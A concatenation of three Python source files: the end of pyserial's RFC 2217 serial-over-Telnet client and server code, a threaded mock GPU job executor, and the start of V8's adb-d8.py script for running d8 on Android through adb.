'"rfc2217://<host>:<port>[?option[&option...]]": {}'.format(e))
return (parts.hostname, parts.port)
# - - - - - - - - - - - - - - - - - - - - - - - -
@property
def in_waiting(self):
"""Return the number of bytes currently in the input buffer."""
if not self.is_open:
raise portNotOpenError
return self._read_buffer.qsize()
def read(self, size=1):
"""\
Read size bytes from the serial port. If a timeout is set it may
return less characters as requested. With no timeout it will block
until the requested number of bytes is read.
"""
if not self.is_open:
raise portNotOpenError
data = bytearray()
try:
timeout = Timeout(self._timeout)
while len(data) < size:
if self._thread is None:
raise SerialException('connection failed (reader thread died)')
data += self._read_buffer.get(True, timeout.time_left())
if timeout.expired():
break
except Queue.Empty: # -> timeout
pass
return bytes(data)
def write(self, data):
"""\
Output the given byte string over the serial port. Can block if the
connection is blocked. May raise SerialException if the connection is
closed.
"""
if not self.is_open:
raise portNotOpenError
with self._write_lock:
try:
self._socket.sendall(to_bytes(data).replace(IAC, IAC_DOUBLED))
except socket.error as e:
raise SerialException("connection failed (socket error): {}".format(e))
return len(data)
def reset_input_buffer(self):
"""Clear input buffer, discarding all that is in the buffer."""
if not self.is_open:
raise portNotOpenError
self.rfc2217_send_purge(PURGE_RECEIVE_BUFFER)
# empty read buffer
while self._read_buffer.qsize():
self._read_buffer.get(False)
def reset_output_buffer(self):
"""\
Clear output buffer, aborting the current output and
discarding all that is in the buffer.
"""
if not self.is_open:
raise portNotOpenError
self.rfc2217_send_purge(PURGE_TRANSMIT_BUFFER)
def _update_break_state(self):
"""\
Set break: Controls TXD. When active, to transmitting is
possible.
"""
if not self.is_open:
raise portNotOpenError
if self.logger:
self.logger.info('set BREAK to {}'.format('active' if self._break_state else 'inactive'))
if self._break_state:
self.rfc2217_set_control(SET_CONTROL_BREAK_ON)
else:
self.rfc2217_set_control(SET_CONTROL_BREAK_OFF)
def _update_rts_state(self):
"""Set terminal status line: Request To Send."""
if not self.is_open:
raise portNotOpenError
if self.logger:
self.logger.info('set RTS to {}'.format('active' if self._rts_state else 'inactive'))
if self._rts_state:
self.rfc2217_set_control(SET_CONTROL_RTS_ON)
else:
self.rfc2217_set_control(SET_CONTROL_RTS_OFF)
def _update_dtr_state(self):
"""Set terminal status line: Data Terminal Ready."""
if not self.is_open:
raise portNotOpenError
if self.logger:
self.logger.info('set DTR to {}'.format('active' if self._dtr_state else 'inactive'))
if self._dtr_state:
self.rfc2217_set_control(SET_CONTROL_DTR_ON)
else:
self.rfc2217_set_control(SET_CONTROL_DTR_OFF)
@property
def cts(self):
"""Read terminal status line: Clear To Send."""
if not self.is_open:
raise portNotOpenError
return bool(self.get_modem_state() & MODEMSTATE_MASK_CTS)
@property
def dsr(self):
"""Read terminal status line: Data Set Ready."""
if not self.is_open:
raise portNotOpenError
return bool(self.get_modem_state() & MODEMSTATE_MASK_DSR)
@property
def ri(self):
"""Read terminal status line: Ring Indicator."""
if not self.is_open:
raise portNotOpenError
return bool(self.get_modem_state() & MODEMSTATE_MASK_RI)
@property
def cd(self):
"""Read terminal status line: Carrier Detect."""
if not self.is_open:
raise portNotOpenError
return bool(self.get_modem_state() & MODEMSTATE_MASK_CD)
# - - - platform specific - - -
# None so far
# - - - RFC2217 specific - - -
def _telnet_read_loop(self):
"""Read loop for the socket."""
mode = M_NORMAL
suboption = None
try:
while self.is_open:
try:
data = self._socket.recv(1024)
except socket.timeout:
# just need to get out of recv form time to time to check if
# still alive
continue
except socket.error as e:
# connection fails -> terminate loop
if self.logger:
self.logger.debug("socket error in reader thread: {}".format(e))
break
if not data:
break # lost connection
for byte in iterbytes(data):
if mode == M_NORMAL:
# interpret as command or as data
if byte == IAC:
mode = M_IAC_SEEN
else:
# store data in read buffer or sub option buffer
# depending on state
if suboption is not None:
suboption += byte
else:
self._read_buffer.put(byte)
elif mode == M_IAC_SEEN:
if byte == IAC:
# interpret as command doubled -> insert character
# itself
if suboption is not None:
suboption += IAC
else:
self._read_buffer.put(IAC)
mode = M_NORMAL
elif byte == SB:
# sub option start
suboption = bytearray()
mode = M_NORMAL
elif byte == SE:
# sub option end -> process it now
self._telnet_process_subnegotiation(bytes(suboption))
suboption = None
mode = M_NORMAL
elif byte in (DO, DONT, WILL, WONT):
# negotiation
telnet_command = byte
mode = M_NEGOTIATE
else:
# other telnet commands
self._telnet_process_command(byte)
mode = M_NORMAL
elif mode == M_NEGOTIATE: # DO, DONT, WILL, WONT was received, option now following
self._telnet_negotiate_option(telnet_command, byte)
mode = M_NORMAL
finally:
self._thread = None
if self.logger:
self.logger.debug("read thread terminated")
# - incoming telnet commands and options
def _telnet_process_command(self, command):
"""Process commands other than DO, DONT, WILL, WONT."""
# Currently none. RFC2217 only uses negotiation and subnegotiation.
if self.logger:
self.logger.warning("ignoring Telnet command: {!r}".format(command))
def _telnet_negotiate_option(self, command, option):
"""Process incoming DO, DONT, WILL, WONT."""
# check our registered telnet options and forward command to them
# they know themselves if they have to answer or not
known = False
for item in self._telnet_options:
# can have more than one match! as some options are duplicated for
# 'us' and 'them'
if item.option == option:
item.process_incoming(command)
known = True
if not known:
# handle unknown options
# only answer to positive requests and deny them
if command == WILL or command == DO:
self.telnet_send_option((DONT if command == WILL else WONT), option)
if self.logger:
self.logger.warning("rejected Telnet option: {!r}".format(option))
def _telnet_process_subnegotiation(self, suboption):
"""Process subnegotiation, the data between IAC SB and IAC SE."""
if suboption[0:1] == COM_PORT_OPTION:
if suboption[1:2] == SERVER_NOTIFY_LINESTATE and len(suboption) >= 3:
self._linestate = ord(suboption[2:3]) # ensure it is a number
if self.logger:
self.logger.info("NOTIFY_LINESTATE: {}".format(self._linestate))
elif suboption[1:2] == SERVER_NOTIFY_MODEMSTATE and len(suboption) >= 3:
self._modemstate = ord(suboption[2:3]) # ensure it is a number
if self.logger:
self.logger.info("NOTIFY_MODEMSTATE: {}".format(self._modemstate))
# update time when we think that a poll would make sense
self._modemstate_timeout.restart(0.3)
elif suboption[1:2] == FLOWCONTROL_SUSPEND:
self._remote_suspend_flow = True
elif suboption[1:2] == FLOWCONTROL_RESUME:
self._remote_suspend_flow = False
else:
for item in self._rfc2217_options.values():
if item.ack_option == suboption[1:2]:
#~ print "processing COM_PORT_OPTION: %r" % list(suboption[1:])
item.check_answer(bytes(suboption[2:]))
break
else:
if self.logger:
self.logger.warning("ignoring COM_PORT_OPTION: {!r}".format(suboption))
else:
if self.logger:
self.logger.warning("ignoring subnegotiation: {!r}".format(suboption))
# - outgoing telnet commands and options
def _internal_raw_write(self, data):
"""internal socket write with no data escaping. used to send telnet stuff."""
with self._write_lock:
self._socket.sendall(data)
def telnet_send_option(self, action, option):
"""Send DO, DONT, WILL, WONT."""
self._internal_raw_write(IAC + action + option)
def rfc2217_send_subnegotiation(self, option, value=b''):
"""Subnegotiation of RFC2217 parameters."""
value = value.replace(IAC, IAC_DOUBLED)
self._internal_raw_write(IAC + SB + COM_PORT_OPTION + option + value + IAC + SE)
def rfc2217_send_purge(self, value):
"""\
Send purge request to the remote.
(PURGE_RECEIVE_BUFFER / PURGE_TRANSMIT_BUFFER / PURGE_BOTH_BUFFERS)
"""
item = self._rfc2217_options['purge']
item.set(value) # transmit desired purge type
item.wait(self._network_timeout) # wait for acknowledge from the server
def rfc2217_set_control(self, value):
"""transmit change of control line to remote"""
item = self._rfc2217_options['control']
item.set(value) # transmit desired control type
if self._ignore_set_control_answer:
# answers are ignored when option is set. compatibility mode for
# servers that answer, but not the expected one... (or no answer
# at all) i.e. sredird
time.sleep(0.1) # this helps getting the unit tests passed
else:
item.wait(self._network_timeout) # wait for acknowledge from the server
def rfc2217_flow_server_ready(self):
"""\
check if server is ready to receive data. block for some time when
not.
"""
#~ if self._remote_suspend_flow:
#~ wait---
def get_modem_state(self):
"""\
get last modem state (cached value. If value is "old", request a new
one. This cache helps that we don't issue to many requests when e.g. all
status lines, one after the other is queried by the user (getCTS, getDSR
etc.)
"""
# active modem state polling enabled? is the value fresh enough?
if self._poll_modem_state and self._modemstate_timeout.expired():
if self.logger:
self.logger.debug('polling modem state')
# when it is older, request an update
self.rfc2217_send_subnegotiation(NOTIFY_MODEMSTATE)
timeout = Timeout(self._network_timeout)
while not timeout.expired():
time.sleep(0.05) # prevent 100% CPU load
# when expiration time is updated, it means that there is a new
# value
if not self._modemstate_timeout.expired():
break
else:
if self.logger:
self.logger.warning('poll for modem state failed')
# even when there is a timeout, do not generate an error just
# return the last known value. this way we can support buggy
# servers that do not respond to polls, but send automatic
# updates.
if self._modemstate is not None:
if self.logger:
self.logger.debug('using cached modem state')
return self._modemstate
else:
# never received a notification from the server
raise SerialException("remote sends no NOTIFY_MODEMSTATE")
#############################################################################
# The following is code that helps implementing an RFC 2217 server.
class PortManager(object):
"""\
This class manages the state of Telnet and RFC 2217. It needs a serial
instance and a connection to work with. Connection is expected to implement
a (thread safe) write function, that writes the string to the network.
"""
def __init__(self, serial_port, connection, logger=None):
self.serial = serial_port
self.connection = connection
self.logger = logger
self._client_is_rfc2217 = False
# filter state machine
self.mode = M_NORMAL
self.suboption = None
self.telnet_command = None
# states for modem/line control events
self.modemstate_mask = 255
self.last_modemstate = None
self.linstate_mask = 0
# all supported telnet options
self._telnet_options = [
TelnetOption(self, 'ECHO', ECHO, WILL, WONT, DO, DONT, REQUESTED),
TelnetOption(self, 'we-SGA', SGA, WILL, WONT, DO, DONT, REQUESTED),
TelnetOption(self, 'they-SGA', SGA, DO, DONT, WILL, WONT, INACTIVE),
TelnetOption(self, 'we-BINARY', BINARY, WILL, WONT, DO, DONT, INACTIVE),
TelnetOption(self, 'they-BINARY', BINARY, DO, DONT, WILL, WONT, REQUESTED),
TelnetOption(self, 'we-RFC2217', COM_PORT_OPTION, WILL, WONT, DO, DONT, REQUESTED, self._client_ok),
TelnetOption(self, 'they-RFC2217', COM_PORT_OPTION, DO, DONT, WILL, WONT, INACTIVE, self._client_ok),
]
# negotiate Telnet/RFC2217 -> send initial requests
if self.logger:
self.logger.debug("requesting initial Telnet/RFC 2217 options")
for option in self._telnet_options:
if option.state is REQUESTED:
self.telnet_send_option(option.send_yes, option.option)
# issue 1st modem state notification
def _client_ok(self):
"""\
callback of telnet option. It gets called when option is activated.
This one here is used to detect when the client agrees on RFC 2217. A
flag is set so that other functions like check_modem_lines know if the
client is OK.
"""
# The callback is used for we and they so if one party agrees, we're
# already happy. it seems not all servers do the negotiation correctly
# and i guess there are incorrect clients too.. so be happy if client
# answers one or the other positively.
self._client_is_rfc2217 = True
if self.logger:
self.logger.info("client accepts RFC 2217")
# this is to ensure that the client gets a notification, even if there
# was no change
self.check_modem_lines(force_notification=True)
# - outgoing telnet commands and options
def telnet_send_option(self, action, option):
"""Send DO, DONT, WILL, WONT."""
self.connection.write(IAC + action + option)
def rfc2217_send_subnegotiation(self, option, value=b''):
"""Subnegotiation of RFC 2217 parameters."""
value = value.replace(IAC, IAC_DOUBLED)
self.connection.write(IAC + SB + COM_PORT_OPTION + option + value + IAC + SE)
# - check modem lines, needs to be called periodically from user to
# establish polling
def check_modem_lines(self, force_notification=False):
"""\
read control lines from serial port and compare the last value sent to remote.
send updates on changes.
"""
modemstate = (
(self.serial.getCTS() and MODEMSTATE_MASK_CTS) |
(self.serial.getDSR() and MODEMSTATE_MASK_DSR) |
(self.serial.getRI() and MODEMSTATE_MASK_RI) |
(self.serial.getCD() and MODEMSTATE_MASK_CD))
# check what has changed
deltas = modemstate ^ (self.last_modemstate or 0) # when last is None -> 0
if deltas & MODEMSTATE_MASK_CTS:
modemstate |= MODEMSTATE_MASK_CTS_CHANGE
if deltas & MODEMSTATE_MASK_DSR:
modemstate |= MODEMSTATE_MASK_DSR_CHANGE
if deltas & MODEMSTATE_MASK_RI:
modemstate |= MODEMSTATE_MASK_RI_CHANGE
if deltas & MODEMSTATE_MASK_CD:
modemstate |= MODEMSTATE_MASK_CD_CHANGE
# if new state is different and the mask allows this change, send
# notification. suppress notifications when client is not rfc2217
if modemstate != self.last_modemstate or force_notification:
if (self._client_is_rfc2217 and (modemstate & self.modemstate_mask)) or force_notification:
self.rfc2217_send_subnegotiation(
SERVER_NOTIFY_MODEMSTATE,
to_bytes([modemstate & self.modemstate_mask]))
if self.logger:
self.logger.info("NOTIFY_MODEMSTATE: {}".format(modemstate))
# save last state, but forget about deltas.
# otherwise it would also notify about changing deltas which is
# probably not very useful
self.last_modemstate = modemstate & 0xf0
# - outgoing data escaping
def escape(self, data):
"""\
This generator function is for the user. All outgoing data has to be
properly escaped, so that no IAC character in the data stream messes up
the Telnet state machine in the server.
socket.sendall(escape(data))
"""
for byte in iterbytes(data):
if byte == IAC:
yield IAC
yield IAC
else:
yield byte
# - incoming data filter
def filter(self, data):
"""\
Handle a bunch of incoming bytes. This is a generator. It will yield
all characters not of interest for Telnet/RFC 2217.
The idea is that the reader thread pushes data from the socket through
this filter:
for byte in filter(socket.recv(1024)):
# do things like CR/LF conversion/whatever
# and write data to the serial port
serial.write(byte)
(socket error handling code left as exercise for the reader)
"""
for byte in iterbytes(data):
if self.mode == M_NORMAL:
# interpret as command or as data
if byte == IAC:
self.mode = M_IAC_SEEN
else:
# store data in sub option buffer or pass it to our
# consumer depending on state
if self.suboption is not None:
self.suboption += byte
else:
yield byte
elif self.mode == M_IAC_SEEN:
if byte == IAC:
# interpret as command doubled -> insert character
# itself
if self.suboption is not None:
self.suboption += byte
else:
yield byte
self.mode = M_NORMAL
elif byte == SB:
# sub option start
self.suboption = bytearray()
self.mode = M_NORMAL
elif byte == SE:
# sub option end -> process it now
self._telnet_process_subnegotiation(bytes(self.suboption))
self.suboption = None
self.mode = M_NORMAL
elif byte in (DO, DONT, WILL, WONT):
# negotiation
self.telnet_command = byte
self.mode = M_NEGOTIATE
else:
# other telnet commands
self._telnet_process_command(byte)
self.mode = M_NORMAL
elif self.mode == M_NEGOTIATE: # DO, DONT, WILL, WONT was received, option now following
self._telnet_negotiate_option(self.telnet_command, byte)
self.mode = M_NORMAL
# - incoming telnet commands and options
def _telnet_process_command(self, command):
"""Process commands other than DO, DONT, WILL, WONT."""
# Currently none. RFC2217 only uses negotiation and subnegotiation.
if self.logger:
self.logger.warning("ignoring Telnet command: {!r}".format(command))
def _telnet_negotiate_option(self, command, option):
"""Process incoming DO, DONT, WILL, WONT."""
# check our registered telnet options and forward command to them
# they know themselves if they have to answer or not
known = False
for item in self._telnet_options:
# can have more than one match! as some options are duplicated for
# 'us' and 'them'
if item.option == option:
item.process_incoming(command)
known = True
if not known:
# handle unknown options
# only answer to positive requests and deny them
if command == WILL or command == DO:
self.telnet_send_option((DONT if command == WILL else WONT), option)
if self.logger:
self.logger.warning("rejected Telnet option: {!r}".format(option))
def _telnet_process_subnegotiation(self, suboption):
"""Process subnegotiation, the data between IAC SB and IAC SE."""
if suboption[0:1] == COM_PORT_OPTION:
if self.logger:
self.logger.debug('received COM_PORT_OPTION: {!r}'.format(suboption))
if suboption[1:2] == SET_BAUDRATE:
backup = self.serial.baudrate
try:
(baudrate,) = struct.unpack(b"!I", suboption[2:6])
if baudrate != 0:
self.serial.baudrate = baudrate
except ValueError as e:
if self.logger:
self.logger.error("failed to set baud rate: {}".format(e))
self.serial.baudrate = backup
else:
if self.logger:
self.logger.info("{} baud rate: {}".format('set' if baudrate else 'get', self.serial.baudrate))
self.rfc2217_send_subnegotiation(SERVER_SET_BAUDRATE, struct.pack(b"!I", self.serial.baudrate))
elif suboption[1:2] == SET_DATASIZE:
backup = self.serial.bytesize
try:
(datasize,) = struct.unpack(b"!B", suboption[2:3])
if datasize != 0:
self.serial.bytesize = datasize
except ValueError as e:
if self.logger:
self.logger.error("failed to set data size: {}".format(e))
self.serial.bytesize = backup
else:
if self.logger:
self.logger.info("{} data size: {}".format('set' if datasize else 'get', self.serial.bytesize))
self.rfc2217_send_subnegotiation(SERVER_SET_DATASIZE, struct.pack(b"!B", self.serial.bytesize))
elif suboption[1:2] == SET_PARITY:
backup = self.serial.parity
try:
parity = struct.unpack(b"!B", suboption[2:3])[0]
if parity != 0:
self.serial.parity = RFC2217_REVERSE_PARITY_MAP[parity]
except ValueError as e:
if self.logger:
self.logger.error("failed to set parity: {}".format(e))
self.serial.parity = backup
else:
if self.logger:
self.logger.info("{} parity: {}".format('set' if parity else 'get', self.serial.parity))
self.rfc2217_send_subnegotiation(
SERVER_SET_PARITY,
struct.pack(b"!B", RFC2217_PARITY_MAP[self.serial.parity]))
elif suboption[1:2] == SET_STOPSIZE:
backup = self.serial.stopbits
try:
stopbits = struct.unpack(b"!B", suboption[2:3])[0]
if stopbits != 0:
self.serial.stopbits = RFC2217_REVERSE_STOPBIT_MAP[stopbits]
except ValueError as e:
if self.logger:
self.logger.error("failed to set stop bits: {}".format(e))
self.serial.stopbits = backup
else:
if self.logger:
self.logger.info("{} stop bits: {}".format('set' if stopbits else 'get', self.serial.stopbits))
self.rfc2217_send_subnegotiation(
SERVER_SET_STOPSIZE,
struct.pack(b"!B", RFC2217_STOPBIT_MAP[self.serial.stopbits]))
elif suboption[1:2] == SET_CONTROL:
if suboption[2:3] == SET_CONTROL_REQ_FLOW_SETTING:
if self.serial.xonxoff:
self.rfc2217_send_subnegotiation(SERVER_SET_CONTROL, SET_CONTROL_USE_SW_FLOW_CONTROL)
elif self.serial.rtscts:
self.rfc2217_send_subnegotiation(SERVER_SET_CONTROL, SET_CONTROL_USE_HW_FLOW_CONTROL)
else:
self.rfc2217_send_subnegotiation(SERVER_SET_CONTROL, SET_CONTROL_USE_NO_FLOW_CONTROL)
elif suboption[2:3] == SET_CONTROL_USE_NO_FLOW_CONTROL:
self.serial.xonxoff = False
self.serial.rtscts = False
if self.logger:
self.logger.info("changed flow control to None")
self.rfc2217_send_subnegotiation(SERVER_SET_CONTROL, SET_CONTROL_USE_NO_FLOW_CONTROL)
elif suboption[2:3] == SET_CONTROL_USE_SW_FLOW_CONTROL:
self.serial.xonxoff = True
if self.logger:
self.logger.info("changed flow control to XON/XOFF")
self.rfc2217_send_subnegotiation(SERVER_SET_CONTROL, SET_CONTROL_USE_SW_FLOW_CONTROL)
elif suboption[2:3] == SET_CONTROL_USE_HW_FLOW_CONTROL:
self.serial.rtscts = True
if self.logger:
self.logger.info("changed flow control to RTS/CTS")
self.rfc2217_send_subnegotiation(SERVER_SET_CONTROL, SET_CONTROL_USE_HW_FLOW_CONTROL)
elif suboption[2:3] == SET_CONTROL_REQ_BREAK_STATE:
if self.logger:
self.logger.warning("requested break state - not implemented")
pass # XXX needs cached value
elif suboption[2:3] == SET_CONTROL_BREAK_ON:
self.serial.setBreak(True)
if self.logger:
self.logger.info("changed BREAK to active")
self.rfc2217_send_subnegotiation(SERVER_SET_CONTROL, SET_CONTROL_BREAK_ON)
elif suboption[2:3] == SET_CONTROL_BREAK_OFF:
self.serial.setBreak(False)
if self.logger:
self.logger.info("changed BREAK to inactive")
self.rfc2217_send_subnegotiation(SERVER_SET_CONTROL, SET_CONTROL_BREAK_OFF)
elif suboption[2:3] == SET_CONTROL_REQ_DTR:
if self.logger:
self.logger.warning("requested DTR state - not implemented")
pass # XXX needs cached value
elif suboption[2:3] == SET_CONTROL_DTR_ON:
self.serial.setDTR(True)
if self.logger:
self.logger.info("changed DTR to active")
self.rfc2217_send_subnegotiation(SERVER_SET_CONTROL, SET_CONTROL_DTR_ON)
elif suboption[2:3] == SET_CONTROL_DTR_OFF:
self.serial.setDTR(False)
if self.logger:
self.logger.info("changed DTR to inactive")
self.rfc2217_send_subnegotiation(SERVER_SET_CONTROL, SET_CONTROL_DTR_OFF)
elif suboption[2:3] == SET_CONTROL_REQ_RTS:
if self.logger:
self.logger.warning("requested RTS state - not implemented")
pass # XXX needs cached value
#~ self.rfc2217_send_subnegotiation(SERVER_SET_CONTROL, SET_CONTROL_RTS_ON)
elif suboption[2:3] == SET_CONTROL_RTS_ON:
self.serial.setRTS(True)
if self.logger:
self.logger.info("changed RTS to active")
self.rfc2217_send_subnegotiation(SERVER_SET_CONTROL, SET_CONTROL_RTS_ON)
elif suboption[2:3] == SET_CONTROL_RTS_OFF:
self.serial.setRTS(False)
if self.logger:
self.logger.info("changed RTS to inactive")
self.rfc2217_send_subnegotiation(SERVER_SET_CONTROL, SET_CONTROL_RTS_OFF)
#~ elif suboption[2:3] == SET_CONTROL_REQ_FLOW_SETTING_IN:
#~ elif suboption[2:3] == SET_CONTROL_USE_NO_FLOW_CONTROL_IN:
#~ elif suboption[2:3] == SET_CONTROL_USE_SW_FLOW_CONTOL_IN:
#~ elif suboption[2:3] == SET_CONTROL_USE_HW_FLOW_CONTOL_IN:
#~ elif suboption[2:3] == SET_CONTROL_USE_DCD_FLOW_CONTROL:
#~ elif suboption[2:3] == SET_CONTROL_USE_DTR_FLOW_CONTROL:
#~ elif suboption[2:3] == SET_CONTROL_USE_DSR_FLOW_CONTROL:
elif suboption[1:2] == NOTIFY_LINESTATE:
# client polls for current state
self.rfc2217_send_subnegotiation(
SERVER_NOTIFY_LINESTATE,
to_bytes([0])) # sorry, nothing like that implemented
elif suboption[1:2] == NOTIFY_MODEMSTATE:
if self.logger:
self.logger.info("request for modem state")
# client polls for current state
self.check_modem_lines(force_notification=True)
elif suboption[1:2] == FLOWCONTROL_SUSPEND:
if self.logger:
self.logger.info("suspend")
self._remote_suspend_flow = True
elif suboption[1:2] == FLOWCONTROL_RESUME:
if self.logger:
self.logger.info("resume")
self._remote_suspend_flow = False
elif suboption[1:2] == SET_LINESTATE_MASK:
self.linstate_mask = ord(suboption[2:3]) # ensure it is a number
if self.logger:
self.logger.info("line state mask: 0x{:02x}".format(self.linstate_mask))
elif suboption[1:2] == SET_MODEMSTATE_MASK:
self.modemstate_mask = ord(suboption[2:3]) # ensure it is a number
if self.logger:
self.logger.info("modem state mask: 0x{:02x}".format(self.modemstate_mask))
elif suboption[1:2] == PURGE_DATA:
if suboption[2:3] == PURGE_RECEIVE_BUFFER:
self.serial.reset_input_buffer()
if self.logger:
self.logger.info("purge in")
self.rfc2217_send_subnegotiation(SERVER_PURGE_DATA, PURGE_RECEIVE_BUFFER)
elif suboption[2:3] == PURGE_TRANSMIT_BUFFER:
self.serial.reset_output_buffer()
if self.logger:
self.logger.info("purge out")
self.rfc2217_send_subnegotiation(SERVER_PURGE_DATA, PURGE_TRANSMIT_BUFFER)
elif suboption[2:3] == PURGE_BOTH_BUFFERS:
self.serial.reset_input_buffer()
self.serial.reset_output_buffer()
if self.logger:
self.logger.info("purge both")
self.rfc2217_send_subnegotiation(SERVER_PURGE_DATA, PURGE_BOTH_BUFFERS)
else:
if self.logger:
self.logger.error("undefined PURGE_DATA: {!r}".format(list(suboption[2:])))
else:
if self.logger:
self.logger.error("undefined COM_PORT_OPTION: {!r}".format(list(suboption[1:])))
else:
if self.logger:
self.logger.warning("unknown subnegotiation: {!r}".format(suboption))
# simple client test
if __name__ == '__main__':
import sys
s = Serial('rfc2217://localhost:7000', 115200)
sys.stdout.write('{}\n'.format(s))
sys.stdout.write("write...\n")
s.write(b"hello\n")
s.flush()
sys.stdout.write("read: {}\n".format(s.read(5)))
s.close()
|
discovery.py
|
import time
from threading import Thread, Event
from queue import Queue
from threading import Lock
def setup_mock_executor(gpu_list, jobs_per_gpu):
return MockExecutor(gpu_list, jobs_per_gpu)
def check_jobs_done_mock(jobs, executor):
while True:
num_finished = sum(executor.check_job_done(job) for job in jobs)
if num_finished == len(jobs):
break
time.sleep(5)
class MockExecutor:
def __init__(self, gpu_list, jobs_per_gpu):
self.gpu_list = gpu_list
self.jobs_per_gpu = jobs_per_gpu
# fc_queue is for jobs to run
self.fc_queue = Queue()
# gpu_queue is for available gpus
self.gpu_queue = Queue()
# done dict indicates which jobs are done
self.done_dict = dict()
self.done_dict_lock = Lock()
# running list keeps track of running jobs
self.running_list = list()
self.running_list_lock = Lock()
# each job gets an index
self.running_job_idx = 0
# enqueue available gpus and start worker threads
self.enqueue_gpus_()
self.worker_run_thread, self.worker_release_thread = None, None
self.worker_release_thread_flag = Event()
self.run_threads_()
def submit(self, run_fc, *args, **kwargs):
job_idx = self.running_job_idx
self.running_job_idx += 1
self.done_dict_lock.acquire()
self.done_dict[job_idx] = False
self.done_dict_lock.release()
self.fc_queue.put((run_fc, job_idx, args, kwargs))
return job_idx
def check_job_done(self, job_idx):
self.done_dict_lock.acquire()
done = self.done_dict[job_idx]
self.done_dict_lock.release()
return done
def stop(self):
self.fc_queue.put(None)
self.worker_release_thread_flag.set()
self.worker_run_thread.join()
self.worker_release_thread.join()
def enqueue_gpus_(self):
for gpu in self.gpu_list:
for _ in range(self.jobs_per_gpu):
self.gpu_queue.put(gpu)
def run_threads_(self):
self.worker_run_thread = Thread(target=self.worker_run_)
self.worker_run_thread.start()
self.worker_release_thread = Thread(target=self.worker_release_)
self.worker_release_thread.start()
def worker_run_(self):
while True:
item = self.fc_queue.get()
if item is None:
break
else:
run_fc, job_idx, args, kwargs = item
gpu_idx = self.gpu_queue.get()
kwargs["gpu"] = gpu_idx
process = run_fc(*args, **kwargs)
self.running_list_lock.acquire()
self.running_list.append((job_idx, gpu_idx, process))
self.running_list_lock.release()
def worker_release_(self):
while True:
self.running_list_lock.acquire()
if self.worker_release_thread_flag.is_set() and len(self.running_list) == 0:
self.running_list_lock.release()
break
to_delete = []
for idx, item in enumerate(self.running_list):
job_idx, gpu_idx, process = item
if process.poll() is not None:
self.done_dict_lock.acquire()
self.done_dict[job_idx] = True
self.done_dict_lock.release()
self.gpu_queue.put(gpu_idx)
to_delete.append(idx)
for idx in reversed(to_delete):
del self.running_list[idx]
self.running_list_lock.release()
# there's no queue so better sleep
time.sleep(5)
|
adb-d8.py
|
#!/usr/bin/env python
# Copyright 2017 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Runs an android build of d8 over adb, with any given arguments. Files
# requested by d8 are transferred on-demand from the caller, by reverse port
# forwarding a simple TCP file server from the computer to the android device.
#
# Usage:
# adb-d8.py <build_dir> [<d8_args>...]
#
# Options:
# <build_dir> The directory containing the android build of d8.
# <d8_args>... The arguments passed through to d8.
#
# Run adb-d8.py --help for complete usage information.
from __future__ import print_function
import os
import sys
import struct
import threading
import subprocess
import SocketServer # TODO(leszeks): python 3 compatibility
def CreateFileHandlerClass(root_dirs, verbose):
class FileHandler(SocketServer.BaseRequestHandler):
def handle(self):
data = self.request.recv(1024);
while data[-1] != "\0":
data += self.request.recv(1024);
filename = data[0:-1]
try:
filename = os.path.abspath(filename)
if not any(filename.startswith(root) for root in root_dirs):
raise Exception("{} not in roots {}".format(filename, root_dirs))
if not os.path.isfile(filename):
raise Exception("{} is not a file".format(filename))
if verbose:
sys.stdout.write("Serving {}\r\n".format(os.path.relpath(filename)))
with open(filename) as f:
contents = f.read();
self.request.sendall(struct.pack("!i", len(contents)))
self.request.sendall(contents)
except Exception as e:
if verbose:
sys.stderr.write(
"Request failed ({})\n".format(e).replace('\n','\r\n'))
self.request.sendall(struct.pack("!i", -1))
return FileHandler
def TransferD8ToDevice(adb, build_dir, device_d8_dir, verbose):
files_to_copy = ["d8", "snapshot_blob.bin"]
# Pipe the output of md5sum from the local computer to the device, checking
# the md5 hashes on the device.
local_md5_sum_proc = subprocess.Popen(
["md5sum"] + files_to_copy,
cwd=build_dir,
stdout=subprocess.PIPE
)
device_md5_check_proc = subprocess.Popen(
[
adb, "shell",
"mkdir -p '{0}' ; cd '{0}' ; md5sum -c -".format(device_d8_dir)
],
stdin=local_md5_sum_proc.stdout,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
# Push any files which failed the md5 check.
(stdoutdata, stderrdata) = device_md5_check_proc.communicate()
for line in stdoutdata.split('\n'):
if line.endswith(": FAILED"):
filename = line[:-len(": FAILED")]
if verbose:
print("Updating {}...".format(filename))
subprocess.check_call([
adb, "push",
os.path.join(build_dir, filename),
device_d8_dir
], stdout=sys.stdout if verbose else open(os.devnull, 'wb'))
def AdbForwardDeviceToLocal(adb, device_port, server_port, verbose):
if verbose:
print("Forwarding device:{} to localhost:{}...".format(
device_port, server_port))
subprocess.check_call([
adb, "reverse",
"tcp:{}".format(device_port),
"tcp:{}".format(server_port)
])
def AdbRunD8(adb, device_d8_dir, device_port, d8_args, verbose):
# Single-quote the arguments to d8, and concatenate them into a string.
d8_arg_str = " ".join("'{}'".format(a) for a in d8_args)
d8_arg_str = "--read-from-tcp-port='{}' ".format(device_port) + d8_arg_str
# Don't use os.path.join for d8 because we care about the device's os, not
# the host os.
d8_str = "{}/d8 {}".format(device_d8_dir, d8_arg_str)
if sys.stdout.isatty():
# Run adb shell with -t to have a tty if we run d8 without a script.
cmd = [adb, "shell", "-t", d8_str]
else:
cmd = [adb, "shell", d8_str]
if verbose:
print("Running {}".format(" ".join(cmd)))
return subprocess.call(cmd)
def PrintUsage(file=sys.stdout):
print("Usage: adb-d8.py [-v|--verbose] [--] <build_dir> [<d8 args>...]",
file=file)
def PrintHelp(file=sys.stdout):
print("""Usage:
adb-d8.py [options] [--] <build_dir> [<d8_args>...]
adb-d8.py -h|--help
Options:
-h|--help Show this help message and exit.
-v|--verbose Print verbose output.
--device-dir=DIR Specify which directory on the device should be used
for the d8 binary. [default: /data/local/tmp/v8]
--extra-root-dir=DIR In addition to the current directory, allow d8 to
access files inside DIR. Multiple additional roots
can be specified.
<build_dir> The directory containing the android build of d8.
<d8_args>... The arguments passed through to d8.""", file=file)
def Main():
if len(sys.argv) < 2:
PrintUsage(sys.stderr)
return 1
script_dir = os.path.dirname(sys.argv[0])
# Use the platform-tools version of adb so that we know it has the reverse
# command.
adb = os.path.join(
script_dir,
"../third_party/android_sdk/public/platform-tools/adb"
)
# Read off any command line flags before build_dir (or --). Do this
# manually, rather than using something like argparse, to be able to split
# the adb-d8 options from the passthrough d8 options.
verbose = False
